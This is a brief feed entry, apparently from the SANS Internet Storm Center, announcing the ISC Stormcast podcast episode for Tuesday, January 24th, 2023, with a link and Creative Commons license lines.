(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2023. január 24.

ISC Stormcast For Tuesday, January 24th, 2023 https://isc.sans.edu/podcastdetail.html&#x3f;id=8338, (Tue, Jan 24th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.